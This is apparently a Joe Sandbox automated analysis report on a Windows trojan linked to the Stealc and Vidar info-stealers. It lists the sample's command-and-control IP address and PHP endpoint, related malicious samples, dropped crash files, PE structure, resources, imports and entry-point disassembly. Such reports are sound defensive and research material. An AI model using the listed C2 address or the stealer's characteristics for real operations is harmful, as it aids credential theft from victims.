                            NameSourceMaliciousAntivirus DetectionReputation
                            http://62.204.41.177/edd20096ecef326d.php31vYjXDbKHt.exe, 00000000.00000002.2280002134.0000000000874000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              http://62.204.41.177/edd20096ecef326d.php21vYjXDbKHt.exe, 00000000.00000002.2280002134.0000000000874000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                http://62.204.41.177/edd20096ecef326d.phpR1vYjXDbKHt.exe, 00000000.00000002.2280002134.00000000008CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  http://62.204.41.177/81vYjXDbKHt.exe, 00000000.00000002.2280002134.0000000000874000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    http://upx.sf.netAmcache.hve.5.drfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://62.204.41.177/CP1vYjXDbKHt.exe, 00000000.00000002.2280002134.00000000008AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      http://62.204.41.177/edd20096ecef326d.phpkP1vYjXDbKHt.exe, 00000000.00000002.2280002134.00000000008AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        http://62.204.41.177/edd20096ecef326d.php91vYjXDbKHt.exe, 00000000.00000002.2280002134.00000000008AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          http://62.204.41.177/ows1vYjXDbKHt.exe, 00000000.00000002.2280002134.00000000008AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            http://62.204.41.177/edd20096ecef326d.phpe1vYjXDbKHt.exe, 00000000.00000002.2280002134.00000000008CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              http://62.204.41.1771vYjXDbKHt.exe, 00000000.00000002.2279761545.000000000083E000.00000004.00000020.00020000.00000000.sdmp, 1vYjXDbKHt.exe, 00000000.00000002.2280002134.0000000000874000.00000004.00000020.00020000.00000000.sdmptrue
                                                unknown
                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs
                                                IPDomainCountryFlagASNASN NameMalicious
                                                62.204.41.177
                                                unknownUnited Kingdom
                                                30798TNNET-ASTNNetOyMainnetworkFItrue
                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1542872
                                                Start date and time:2024-10-26 19:07:35 +02:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 4m 38s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:8
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:1vYjXDbKHt.exe
                                                renamed because original name is a hash value
                                                Original Sample Name:902c133812718bacf8e86a6d8bbeb22d.exe
                                                Detection:MAL
                                                Classification:mal100.troj.evad.winEXE@2/5@4/1
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HCA Information:
                                                • Successful, ratio: 100%
                                                • Number of executed functions: 23
                                                • Number of non-executed functions: 165
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                • Excluded IPs from analysis (whitelisted): 52.182.143.212
                                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, otelrules.azureedge.net, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • VT rate limit hit for: 1vYjXDbKHt.exe
                                                TimeTypeDescription
                                                13:08:41API Interceptor1x Sleep call for process: WerFault.exe modified
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                62.204.41.177716b3c89802c1713871667444720e62f3fc064c9910a1.exeGet hashmaliciousStealcBrowse
                                                • 62.204.41.177/edd20096ecef326d.php
                                                oqIz1tfl5h.exeGet hashmaliciousStealcBrowse
                                                • 62.204.41.177/edd20096ecef326d.php
                                                jicQJ2cdlM.exeGet hashmaliciousStealcBrowse
                                                • 62.204.41.177/edd20096ecef326d.php
                                                c4da1217278a52b300055859db330a4a3dca4ad09fe56.exeGet hashmaliciousStealcBrowse
                                                • 62.204.41.177/edd20096ecef326d.php
                                                w12rykWq2L.exeGet hashmaliciousStealcBrowse
                                                • 62.204.41.177/edd20096ecef326d.php
                                                jWpgP22dl2.exeGet hashmaliciousStealcBrowse
                                                • 62.204.41.177/edd20096ecef326d.php
                                                mCe4hBfqCT.exeGet hashmaliciousStealcBrowse
                                                • 62.204.41.177/edd20096ecef326d.php
                                                Ondso1o6Yz.exeGet hashmaliciousStealcBrowse
                                                • 62.204.41.177/edd20096ecef326d.php
                                                BKoQ3DF8eD.exeGet hashmaliciousStealcBrowse
                                                • 62.204.41.177/edd20096ecef326d.php
                                                ZDW7Di1Ykf.exeGet hashmaliciousStealc, VidarBrowse
                                                • 62.204.41.177/edd20096ecef326d.php
                                                No context
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                TNNET-ASTNNetOyMainnetworkFI716b3c89802c1713871667444720e62f3fc064c9910a1.exeGet hashmaliciousStealcBrowse
                                                • 62.204.41.177
                                                oqIz1tfl5h.exeGet hashmaliciousStealcBrowse
                                                • 62.204.41.177
                                                jicQJ2cdlM.exeGet hashmaliciousStealcBrowse
                                                • 62.204.41.177
                                                c4da1217278a52b300055859db330a4a3dca4ad09fe56.exeGet hashmaliciousStealcBrowse
                                                • 62.204.41.177
                                                w12rykWq2L.exeGet hashmaliciousStealcBrowse
                                                • 62.204.41.177
                                                jWpgP22dl2.exeGet hashmaliciousStealcBrowse
                                                • 62.204.41.177
                                                mCe4hBfqCT.exeGet hashmaliciousStealcBrowse
                                                • 62.204.41.177
                                                Ondso1o6Yz.exeGet hashmaliciousStealcBrowse
                                                • 62.204.41.177
                                                BKoQ3DF8eD.exeGet hashmaliciousStealcBrowse
                                                • 62.204.41.177
                                                ZDW7Di1Ykf.exeGet hashmaliciousStealc, VidarBrowse
                                                • 62.204.41.177
                                                No context
                                                No context
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.9653770358696365
                                                Encrypted:false
                                                SSDEEP:192:xBzOR5V0Gv9S3jMhZrMZtzuiFnZ24IO8LV:052Gv9S3jjTzuiFnY4IO8L
                                                MD5:15D125C63F274BF03F6C94E82C414CA2
                                                SHA1:EC10335FE0196AF29E6156EFF7DD52318EDB37DD
                                                SHA-256:B805DA866A6035CB2E812AB26591A8022287837CD3E17A82C115BB97CF7904D3
                                                SHA-512:D86D7724A99C01CDAB96B7594241107AA255F9FAEDEC2A9E1C1692973C96BF7624FE8E6A09BCE6FA6360ABFD3D7A953C29A2F4ED988015A56A3202184540AF3D
                                                Malicious:true
                                                Reputation:low
                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.4.3.6.1.1.8.4.5.2.9.8.8.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.4.3.6.1.1.8.9.6.8.6.1.2.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.9.1.4.c.2.e.c.-.3.9.7.b.-.4.7.9.5.-.9.1.d.1.-.4.f.7.7.b.5.c.b.6.1.8.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.b.7.4.b.8.4.2.-.1.0.f.9.-.4.8.8.4.-.b.4.4.c.-.1.5.c.d.4.d.5.0.0.e.a.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.1.v.Y.j.X.D.b.K.H.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.8.8.-.0.0.0.1.-.0.0.1.5.-.5.5.0.2.-.3.9.a.e.c.9.2.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.7.1.1.4.9.1.c.4.f.b.2.7.b.5.7.0.f.b.5.0.a.e.0.8.f.c.2.2.b.c.0.0.0.0.0.f.f.f.f.!.0.0.0.0.2.3.a.e.2.f.d.a.f.0.c.8.5.b.0.8.e.1.3.e.f.6.8.d.9.2.5.9.9.7.c.0.8.a.1.9.a.1.f.9.!.1.v.Y.j.X.D.b.K.H.t...e.x.e.....T.a.r.g.e.t.A.p.p.
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Sat Oct 26 17:08:38 2024, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):60622
                                                Entropy (8bit):1.9128940627677222
                                                Encrypted:false
                                                SSDEEP:192:WyMXUjStWaLVXRSOEOJw0CYcL5GQdz9XbDWQWE6tYN4d5ZCWMmJkO0wXHT:XStWypEEnCYcLgQ99XbOtF7MmJ53T
                                                MD5:710F6BFADF7D6014A5C6E2B94A60953C
                                                SHA1:E1E44CE9DB77492837FEFAAE9F34859F88E7BB1B
                                                SHA-256:5A67465431730ECAADBBFE057C3F2FD926855D1D92E1D543BBBE9E7316EEB6A5
                                                SHA-512:12BFFBA9874D2C00CF6E9CDA4C64789160490A38DC354B48DF8E11D459EC8634367D9CB47B721562A95DFBB76577B386378EB6C7EFF58973930235A0CCC1DAC4
                                                Malicious:false
                                                Reputation:low
                                                Preview:MDMP..a..... ........".g............4...............<............*..........T.......8...........T...........(3..........................................................................................................eJ......H.......GenuineIntel............T............".g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8336
                                                Entropy (8bit):3.7081387231579535
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJxz6Znc26Y2DFSU9f7gmfXqipDB89bu+sf66m:R6lXJF6ZnF6YoSU9f7gmfXqxu9fO
                                                MD5:6BBE64618FF9377A9EEFD90745DC468A
                                                SHA1:331A2EDBF94C1C5584CE0FF18D8DB5007D70AFB8
                                                SHA-256:69702D774DAA329F93F41FBFE3B7815C53092FAC0CCEB0176C6F787E723F5D2C
                                                SHA-512:F561212BFD9D94C968CB841EAA0A0A46527B3C1F75AD6FBA63B8101B6EE87B52D78CF1D378B1D1D22ECE973538DEB9E64487FA264D18EF93D115731B93A4468F
                                                Malicious:false
                                                Reputation:low
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.0.0.0.<./.P.i.
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4579
                                                Entropy (8bit):4.474806806696447
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zspJg77aI9qNWpW8VYPYm8M4J2KgFA+q8azQN+asVdd:uIjf7I7A87VbJHC6Vdd
                                                MD5:1A0B15D8AD4BB46509EE46BAB966BA50
                                                SHA1:4C4566A75DC1CD15F336AEE49D8C2C1B357E447D
                                                SHA-256:668AF9BF4D0CF7ED707D705B24148FE948DA3D56B184A253BDE32D5B126CA302
                                                SHA-512:9EE82988DD6CD55002BFED26330ABBB1286CCE22FED6F346CFAEED06FC73290C30E04A5D51AA7E9D7DF2175E5B3A4F7A292C23E6395A28F94AC58A7C6980B7A6
                                                Malicious:false
                                                Reputation:low
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="560651" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:MS Windows registry file, NT/2000 or above
                                                Category:dropped
                                                Size (bytes):1835008
                                                Entropy (8bit):4.468617584742212
                                                Encrypted:false
                                                SSDEEP:6144:azZfpi6ceLPx9skLmb0fsZWSP3aJG8nAgeiJRMMhA2zX4WABluuNijDH5S:8ZHtsZWOKnMM6bFpEj4
                                                MD5:969511FCEA21C99B297A0129F28CEA97
                                                SHA1:920F2A4ACF307FD88AE93D4BC77AC4C5A2956669
                                                SHA-256:9ECF9752E48E88AFF1C7AC486837367E477D8A8387CD027863FFB616AC8CCB66
                                                SHA-512:238DA27510C54A34A719675A47B26630C5D67755A2ED2BAB9CA300ADE72FACDE6CCA4ADE1B30DEE8DECC8B77B576AA7C53D4F5D4643F358705D50EF54BBA620F
                                                Malicious:false
                                                Reputation:low
                                                Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.....'..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Entropy (8bit):6.599470498787288
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.53%
                                                • InstallShield setup (43055/19) 0.43%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:1vYjXDbKHt.exe
                                                File size:387'584 bytes
                                                MD5:902c133812718bacf8e86a6d8bbeb22d
                                                SHA1:23ae2fdaf0c85b08e13ef68d925997c08a19a1f9
                                                SHA256:138d2a62b73e89fc4d09416bcefed27e139ae90016ba4493efc5fbf43b66acfa
                                                SHA512:d3c722002a4eb49d5e13e0cccc9337c14fae11dda53d5e101e32f169023019b0397366317bd7d39c2259b31af731ec4b39b26f95e3438fdc11105dd6eaf9f2a4
                                                SSDEEP:6144:uAx2yMSSrmLKHzjOIKBvhjR5Il3KOpRUton3o:n0kHnvJR5Il64RUt
                                                TLSH:BF846B2161F6A852EFB75B315E2A96DCD6EBBC62DE38525DB1103E0F08733B1C912712
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........V...7...7...7...x?..7...e-..7...e<..7...e*..7.......7...7...7...e#..7...e=..7...e8..7..Rich.7..................PE..L......e...
                                                Icon Hash:151a111112911209
                                                Entrypoint:0x4016ea
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                                Time Stamp:0x65E0110E [Thu Feb 29 05:07:26 2024 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:5
                                                OS Version Minor:0
                                                File Version Major:5
                                                File Version Minor:0
                                                Subsystem Version Major:5
                                                Subsystem Version Minor:0
                                                Import Hash:77f62e8c6858bdb8e1d43a9c6ff0e9cc
                                                Instruction
                                                call 00007F3CED12DCE8h
                                                jmp 00007F3CED12A67Dh
                                                mov edi, edi
                                                push ebp
                                                mov ebp, esp
                                                sub esp, 00000328h
                                                mov dword ptr [0043D478h], eax
                                                mov dword ptr [0043D474h], ecx
                                                mov dword ptr [0043D470h], edx
                                                mov dword ptr [0043D46Ch], ebx
                                                mov dword ptr [0043D468h], esi
                                                mov dword ptr [0043D464h], edi
                                                mov word ptr [0043D490h], ss
                                                mov word ptr [0043D484h], cs
                                                mov word ptr [0043D460h], ds
                                                mov word ptr [0043D45Ch], es
                                                mov word ptr [0043D458h], fs
                                                mov word ptr [0043D454h], gs
                                                pushfd
                                                pop dword ptr [0043D488h]
                                                mov eax, dword ptr [ebp+00h]
                                                mov dword ptr [0043D47Ch], eax
                                                mov eax, dword ptr [ebp+04h]
                                                mov dword ptr [0043D480h], eax
                                                lea eax, dword ptr [ebp+08h]
                                                mov dword ptr [0043D48Ch], eax
                                                mov eax, dword ptr [ebp-00000320h]
                                                mov dword ptr [0043D3C8h], 00010001h
                                                mov eax, dword ptr [0043D480h]
                                                mov dword ptr [0043D37Ch], eax
                                                mov dword ptr [0043D370h], C0000409h
                                                mov dword ptr [0043D374h], 00000001h
                                                mov eax, dword ptr [0043C004h]
                                                mov dword ptr [ebp-00000328h], eax
                                                mov eax, dword ptr [0043C008h]
                                                mov dword ptr [ebp-00000324h], eax
                                                call dword ptr [000000ECh]
                                                Programming Language:
                                                • [C++] VS2008 build 21022
                                                • [ASM] VS2008 build 21022
                                                • [ C ] VS2008 build 21022
                                                • [IMP] VS2005 build 50727
                                                • [RES] VS2008 build 21022
                                                • [LNK] VS2008 build 21022
                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x3ab4c0x3c.rdata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x11c0000x204f8.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x390000x1ac.rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x10000x370900x37200ff844da2b6bc05c9bc8f85c5fa55fb33False0.8356141935941043data7.4896031125195375IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rdata0x390000x25060x26008c92f662f88a2cb20c44ac667d6a02fcFalse0.3743832236842105data5.441434008831436IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data0x3c0000xdf67c0x4800bb99a580da4ef30ef0b124439ab1cff6False0.051215277777777776data0.6175020868884205IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .rsrc0x11c0000x1444f80x206006062dfadd00213bd2e3e0840b3bdd46cFalse0.4089119811776062data4.914533709532199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_CURSOR0x1345e80x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.7368421052631579
                                                RT_CURSOR0x1347180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.06130705394190871
                                                RT_ICON0x11cac00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.5565031982942431
                                                RT_ICON0x11d9680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.6304151624548736
                                                RT_ICON0x11e2100x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.6762672811059908
                                                RT_ICON0x11e8d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.736271676300578
                                                RT_ICON0x11ee400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkishTurkey0.5033195020746888
                                                RT_ICON0x1213e80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkishTurkey0.5968574108818011
                                                RT_ICON0x1224900x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkishTurkey0.5926229508196721
                                                RT_ICON0x122e180x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkishTurkey0.7331560283687943
                                                RT_ICON0x1232f80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.3358208955223881
                                                RT_ICON0x1241a00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.39395306859205775
                                                RT_ICON0x124a480x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.3957373271889401
                                                RT_ICON0x1251100x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.4060693641618497
                                                RT_ICON0x1256780x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TurkishTurkey0.22095435684647302
                                                RT_ICON0x127c200x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TurkishTurkey0.24835834896810507
                                                RT_ICON0x128cc80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TurkishTurkey0.28647540983606556
                                                RT_ICON0x1296500x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TurkishTurkey0.3147163120567376
                                                RT_ICON0x129b300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.39019189765458423
                                                RT_ICON0x12a9d80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.5464801444043321
                                                RT_ICON0x12b2800x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.6094470046082949
                                                RT_ICON0x12b9480x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.6401734104046243
                                                RT_ICON0x12beb00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkishTurkey0.4101782363977486
                                                RT_ICON0x12cf580x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.39959016393442626
                                                RT_ICON0x12d8e00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.44858156028368795
                                                RT_ICON0x12ddb00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.339818763326226
                                                RT_ICON0x12ec580x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.4711191335740072
                                                RT_ICON0x12f5000x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.49942396313364057
                                                RT_ICON0x12fbc80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.5252890173410405
                                                RT_ICON0x1301300x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TurkishTurkey0.42655601659751036
                                                RT_ICON0x1326d80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkishTurkey0.4357410881801126
                                                RT_ICON0x1337800x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.43483606557377047
                                                RT_ICON0x1341080x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.449468085106383
                                                RT_STRING0x136e980x9adata0.6038961038961039
                                                RT_STRING0x136f380x6dadata0.4264538198403649
                                                RT_STRING0x1376180x4aadata0.4455611390284757
                                                RT_STRING0x137ac80x4dcdata0.4429260450160772
                                                RT_STRING0x137fa80x7d4data0.41966067864271456
                                                RT_STRING0x1387800x718data0.42841409691629956
                                                RT_STRING0x138e980x696data0.4359430604982206
                                                RT_STRING0x1395300x616data0.43902439024390244
                                                RT_STRING0x139b480x7dedata0.41807348560079444
                                                RT_STRING0x13a3280x5c6data0.4370771312584574
                                                RT_STRING0x13a8f00x5d8data0.44385026737967914
                                                RT_STRING0x13aec80x588data0.4392655367231638
                                                RT_STRING0x13b4500x616data0.43838254172015406
                                                RT_STRING0x13ba680x4eedata0.4548335974643423
                                                RT_STRING0x13bf580x5a0data0.4354166666666667
                                                RT_GROUP_CURSOR0x136cc00x22data1.0588235294117647
                                                RT_GROUP_ICON0x1345700x76dataTurkishTurkey0.6694915254237288
                                                RT_GROUP_ICON0x1232800x76dataTurkishTurkey0.6610169491525424
                                                RT_GROUP_ICON0x12dd480x68dataTurkishTurkey0.7211538461538461
                                                RT_GROUP_ICON0x129ab80x76dataTurkishTurkey0.6694915254237288
                                                RT_VERSION0x136ce80x1b0data0.5856481481481481
                                                DLLImport
                                                KERNEL32.dllGetComputerNameA, GetNumaNodeProcessorMask, GetNumaProcessorNode, GetLocaleInfoA, CallNamedPipeA, DeleteVolumeMountPointA, InterlockedIncrement, MoveFileExW, SetDefaultCommConfigW, GetEnvironmentStringsW, GlobalLock, GetTimeFormatA, SetCommBreak, FreeEnvironmentStringsA, GetModuleHandleW, FormatMessageA, CopyFileW, GetSystemWow64DirectoryW, GetVersionExW, HeapCreate, GetNamedPipeInfo, GetConsoleAliasW, GetFileAttributesW, GetBinaryTypeA, GetModuleFileNameW, GetConsoleFontSize, IsBadStringPtrA, WritePrivateProfileStringW, GetStringTypeExA, LCMapStringA, GetStdHandle, SetLastError, GetProcAddress, GetLongPathNameA, LoadLibraryA, UnhandledExceptionFilter, InterlockedExchangeAdd, OpenWaitableTimerW, LocalAlloc, SetCalendarInfoW, MoveFileA, SetCommMask, GetOEMCP, BuildCommDCBA, FatalAppExitA, FindAtomW, ReadConsoleOutputCharacterW, OpenFileMappingA, LocalFree, LocalFileTimeToFileTime, CloseHandle, WriteConsoleW, HeapAlloc, MultiByteToWideChar, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, SetUnhandledExceptionFilter, IsDebuggerPresent, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapReAlloc, Sleep, ExitProcess, WriteFile, GetModuleFileNameA, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, GetLastError, InterlockedDecrement, HeapSize, GetCPInfo, GetACP, IsValidCodePage, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, 